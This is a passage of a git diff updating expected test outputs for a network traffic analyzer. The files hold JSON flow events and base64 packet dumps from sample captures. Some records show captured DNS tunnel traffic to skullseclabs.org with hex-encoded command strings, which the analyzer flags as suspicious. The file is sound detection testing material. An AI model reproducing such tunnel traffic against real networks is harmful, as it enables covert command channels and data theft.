-00968{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":23,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1486012635073,"flow_last_seen":1486012638093,"flow_idle_time":200000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":364,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1486012638093,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":56354,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"46b100fdf525320021636f6d6d616e64202873697276696d65732900.skullseclabs.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":5,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00969{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1486012635073,"flow_last_seen":1486012639101,"flow_idle_time":200000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":455,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1486012639101,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":56354,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"c75900fdf525320021636f6d6d616e64202873697276696d65732900.skullseclabs.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":16,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -01080{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":25,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1486012635073,"flow_last_seen":1486012639174,"flow_idle_time":200000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":122,"flow_tot_l4_payload_len":577,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1486012639174,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":56354,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"27": {"risk":"Risky Domain Name","severity":"Medium","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"c75900fdf525320021636f6d6d616e64202873697276696d65732900.skullseclabs.org","num_queries":1,"num_answers":1,"reply_code":0,"query_type":16,"rsp_type":16,"rsp_addr":"0.0.0.0"}} +00968{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":22,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1486012635073,"flow_last_seen":1486012637085,"flow_idle_time":200000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":273,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1486012637085,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":56354,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"e18f00fdf525320021636f6d6d616e64202873697276696d65732900.skullseclabs.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":5,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00968{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":23,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1486012635073,"flow_last_seen":1486012638093,"flow_idle_time":200000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":364,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1486012638093,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":56354,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"46b100fdf525320021636f6d6d616e64202873697276696d65732900.skullseclabs.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":5,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00969{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1486012635073,"flow_last_seen":1486012639101,"flow_idle_time":200000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":455,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1486012639101,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":56354,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"c75900fdf525320021636f6d6d616e64202873697276696d65732900.skullseclabs.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":16,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +01080{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":25,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1486012635073,"flow_last_seen":1486012639174,"flow_idle_time":200000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":122,"flow_tot_l4_payload_len":577,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1486012639174,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":56354,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"27": {"risk":"Risky Domain Name","severity":"Medium","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"c75900fdf525320021636f6d6d616e64202873697276696d65732900.skullseclabs.org","num_queries":1,"num_answers":1,"reply_code":0,"query_type":16,"rsp_type":16,"rsp_addr":"0.0.0.0"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":369,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486012730177,"flow_last_seen":1486012730177,"flow_idle_time":200000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":91,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1486012730177,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":46961,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00570{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":369,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1486012730177,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":133,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":133,"pkt_l4_len":99,"thread_ts_msec":1486012730177,"pkt":"AhoR+f4q5LMYS\/DDCABFAAB3Lk5AAEARGh\/AqCtbBAICBLdxADUAYz49\/HsBAAABAAAAAAAAOGEwNTcwMGU2ZGE4MzUxMDAwMTYzNmY2ZTczNmY2YzY1MjAyODczNjk3Mjc2Njk2ZDY1NzMyOTAwDHNrdWxsc2VjbGFicwNvcmcAAA8AAQ=="} -00961{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":369,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486012730177,"flow_last_seen":1486012730177,"flow_idle_time":200000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":91,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1486012730177,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":46961,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"a05700e6da83510001636f6e736f6c65202873697276696d65732900.skullseclabs.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":15,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00961{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":369,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486012730177,"flow_last_seen":1486012730177,"flow_idle_time":200000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":91,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1486012730177,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":46961,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"a05700e6da83510001636f6e736f6c65202873697276696d65732900.skullseclabs.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":15,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00614{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":370,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1486012730381,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1486012730381,"pkt":"5LMYS\/DDAhoR+f4qCABFAACaAABAADMRVUoEAgIEwKgrWwA1t3EAhvb+\/HuBgAABAAEAAAAAOGEwNTcwMGU2ZGE4MzUxMDAwMTYzNmY2ZTczNmY2YzY1MjAyODczNjk3Mjc2Njk2ZDY1NzMyOTAwDHNrdWxsc2VjbGFicwNvcmcAAA8AAcAMAA8AAQAAADwAFwAKEmRlNjkwMGU2ZGE2ZWEyMDAwMMBF"} -01082{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":370,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1486012730177,"flow_last_seen":1486012730381,"flow_idle_time":200000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1486012730381,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":46961,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"27": {"risk":"Risky Domain Name","severity":"Medium","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"a05700e6da83510001636f6e736f6c65202873697276696d65732900.skullseclabs.org","num_queries":1,"num_answers":1,"reply_code":0,"query_type":15,"rsp_type":15,"rsp_addr":"0.0.0.0"}} +01082{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":370,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1486012730177,"flow_last_seen":1486012730381,"flow_idle_time":200000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1486012730381,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":46961,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"27": {"risk":"Risky Domain Name","severity":"Medium","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"a05700e6da83510001636f6e736f6c65202873697276696d65732900.skullseclabs.org","num_queries":1,"num_answers":1,"reply_code":0,"query_type":15,"rsp_type":15,"rsp_addr":"0.0.0.0"}} 00514{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":371,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1486012730381,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1486012730381,"pkt":"AhoR+f4q5LMYS\/DDCABFAABRLntAAEARGhjAqCtbBAICBLdxADUAPY6IeT8BAAABAAAAAAAAEmI1NDEwMWU2ZGE4MzUxNmVhMgxza3VsbHNlY2xhYnMDb3JnAAAPAAE="} -00924{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":382,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1486012730177,"flow_last_seen":1486012733669,"flow_idle_time":200000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":1495,"flow_avg_l4_payload_len":106,"midstream":0,"thread_ts_msec":1486012733669,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":46961,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"27": {"risk":"Risky Domain Name","severity":"Medium","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00926{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":382,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":349,"flow_first_seen":1486012635073,"flow_last_seen":1486012727540,"flow_idle_time":200000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":80215,"flow_avg_l4_payload_len":229,"midstream":0,"thread_ts_msec":1486012733669,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":56354,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"27": {"risk":"Risky Domain Name","severity":"Medium","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00923{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":382,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1486012623234,"flow_last_seen":1486012630741,"flow_idle_time":200000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":1620,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":1486012733669,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":35966,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"27": {"risk":"Risky Domain Name","severity":"Medium","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00924{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":382,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1486012730177,"flow_last_seen":1486012733669,"flow_idle_time":200000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":1495,"flow_avg_l4_payload_len":106,"midstream":0,"thread_ts_msec":1486012733669,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":46961,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"27": {"risk":"Risky Domain Name","severity":"Medium","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00926{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":382,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":349,"flow_first_seen":1486012635073,"flow_last_seen":1486012727540,"flow_idle_time":200000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":80215,"flow_avg_l4_payload_len":229,"midstream":0,"thread_ts_msec":1486012733669,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":56354,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"27": {"risk":"Risky Domain Name","severity":"Medium","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00923{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":382,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1486012623234,"flow_last_seen":1486012630741,"flow_idle_time":200000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":1620,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":1486012733669,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":35966,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"27": {"risk":"Risky Domain Name","severity":"Medium","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00568{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":382,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","packets-captured":382,"packets-processed":382,"total-skipped-flows":0,"total-l4-payload-len":83330,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":8,"total-updates":0,"current-active-flows":0,"total-active-flows":3,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":29,"global_ts_msec":1486012733669} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 382/382 @@ -35,9 +35,9 @@ ~~ total active/idle flows...: 3/3 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5882965 bytes -~~ total memory freed........: 5882965 bytes -~~ total allocations/frees...: 118510/118510 +~~ total memory allocated....: 6016599 bytes +~~ total memory freed........: 6016599 bytes +~~ total allocations/frees...: 121272/121272 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 471 chars ~~ json string max len.......: 1087 chars diff --git a/test/results/badpackets.pcap.out b/test/results/badpackets.pcap.out index 88f15075f..c2259e72a 100644 --- a/test/results/badpackets.pcap.out +++ b/test/results/badpackets.pcap.out @@ -210,9 +210,9 @@ ~~ total active/idle flows...: 0/0 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5868383 bytes -~~ total memory freed........: 5868383 bytes -~~ total allocations/frees...: 118110/118110 +~~ total memory allocated....: 6002017 bytes +~~ total memory freed........: 6002017 bytes +~~ total allocations/frees...: 120872/120872 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 209 chars ~~ json string max len.......: 2303 chars diff --git a/test/results/bitcoin.pcap.out b/test/results/bitcoin.pcap.out index 9cfb4ec1b..37d0fa856 100644 --- a/test/results/bitcoin.pcap.out +++ b/test/results/bitcoin.pcap.out @@ -2,43 +2,43 @@ 00547{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"bitcoin.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1301327937725} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301327937725,"flow_last_seen":1301327937725,"flow_idle_time":7580000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301327937725,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"188.165.213.169","src_port":55317,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00615{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1301327937725,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301327937725,"pkt":"ACPrIpS0ACNshovhCABFAACdb3BAAEAGdmXAqAGOvKXVqdgVII1UFpaF9ORId4AY\/\/\/XwQAAAQEICicy22Mwkrss+b602XZlcnNpb24AAAAAAFUAAAABfQAAAQAAAAAAAABBsJBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/vKXVqSCNAQAAAAAAAAAAAAAAAAAAAAAA\/\/\/AqAGOII3ZMDrPGxAeDAD6vQEA"} -00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301327937725,"flow_last_seen":1301327937725,"flow_idle_time":7580000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301327937725,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"188.165.213.169","src_port":55317,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301327937725,"flow_last_seen":1301327937725,"flow_idle_time":7580000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301327937725,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"188.165.213.169","src_port":55317,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1301327937800,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301327937800,"pkt":"ACNshovhACPrIpS0CABFAACd8zJAADQG\/qK8pdWpwKgBjiCN2BX05Eh3VBaWhYAYAC7fMwAAAQEICjCSu0gnMttj+b602XZlcnNpb24AAAAAAFUAAACcfAAAAQAAAAAAAABqsJBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/JmCEHtgVAQAAAAAAAAAAAAAAAAAAAAAA\/\/+8pdWpII1MLcnArv8XlgAGwwEA"} 01828{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1301327937931,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1067,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1067,"pkt_l4_len":1033,"thread_ts_msec":1301327937931,"pkt":"ACPrIpS0ACNshovhCABFAAQdZEVAAEAGfhDAqAGOvKXVqdgVII1UFpbu9ORI4IAY\/\/\/JGQAAAQEICicy22UwkrtL+b602XZlcmFjawAAAAAAAAAAAAD5vrTZZ2V0YWRkcgAAAAAAAAAAAF324OL5vrTZZ2V0YmxvY2tzAAAApQMAAGlfIuqcfAAAHKh7ybVTxuZIQjrl7yTcgS++hNhBt1zq9NegAAAAAAAA0isW7TPLR9+QJv0A5WbZVCvm695mFYsw+RcAAAAAAAAKtKqLikjG018uz8LfLAtdjFIkeP\/i1erq1gAAAAAAAJBdQRxOhTejsSgFAkOe4jLdh+MgkNThEJ18AAAAAAAAuqLvaBfSt3u\/xIqIdA14a1vMRWgufw\/9NSQAAAAAAABmO+ZaHQMV8GVsd2tLL4rFQTc0+9Vfwkt\/KAAAAAAAAJT+LTuh4xfC31zGm\/GrV7uiO60OaIRMkzcNAAAAAAAAuhdRV0aXd6Zg2v\/d1GRW41CXeTNnyZ2lADQAAAAAAADN6C3MlB3uxd0izHdkP3dhS0au0yU7AWAQZwAAAAAAAL+B7POHga71M99A8Eu3CYdV7ruvTTFqTRaEAAAAAAAA3UsnAThWfVMwqZa+fYK\/+mnwaocTsbQIG1kAAAAAAADey3zxujtbDGk\/QTgO92YcU4PswnA6nOZ6FgAAAAAAAMDzxV+Dq1G5LChOJMi\/klliIw7dOCRLUwU1AAAAAAAAPos8A4n6clF7nKE4hFivm22s790lzTk\/xUsAAAAAAAC0sS5A1Mm4fwV3yc3Q1LndsofGdqv023cDhAAAAAAAAGvuGwU2Et\/fX33Zfbvd3fo\/8TaDBcaUcU3CAAAAAAAAP2JWK5H+eMf+Pv\/jSxNvOoqfqtxRlUdLIhEAAAAAAADJveYZh3372qwQQlL9GVXITa9jJ6DXXZhGDQAAAAAAAKMYV6DpTz6VcKhTn2GDUxJn1w6c\/OztngqRAAAAAAAABDCPkjdagfw0FOqHQEeRGYOTGUOY4U7Z+TMAAAAAAABH73UkZZo8i3KUfaLV4BIT5FRuJgLU9+S6PwAAAAAAAEhKQKlsPJI3JIw8Tb+HHwelgYW13heoG+NwAAAAAAAAGoeNNbO0PKw7FoNOsSIzS8W\/U8wXt9nuho8AAAAAAADVlxLK6O44NewFXywS+BNdzYycb7g7WSY\/qQEAAAAAAKqI+qWcSpEbTrldQNWUJik+3hdENRtaz0ynBAAAAAAA\/6kPGMjbu4hU+GZN83C9X6Hc1si6bqd\/l3UhAAAAAABKw0jIrFFXJp9oPx6NizqHl5jwjXfMij2VrHIgAAAAAG\/ijAq28bNy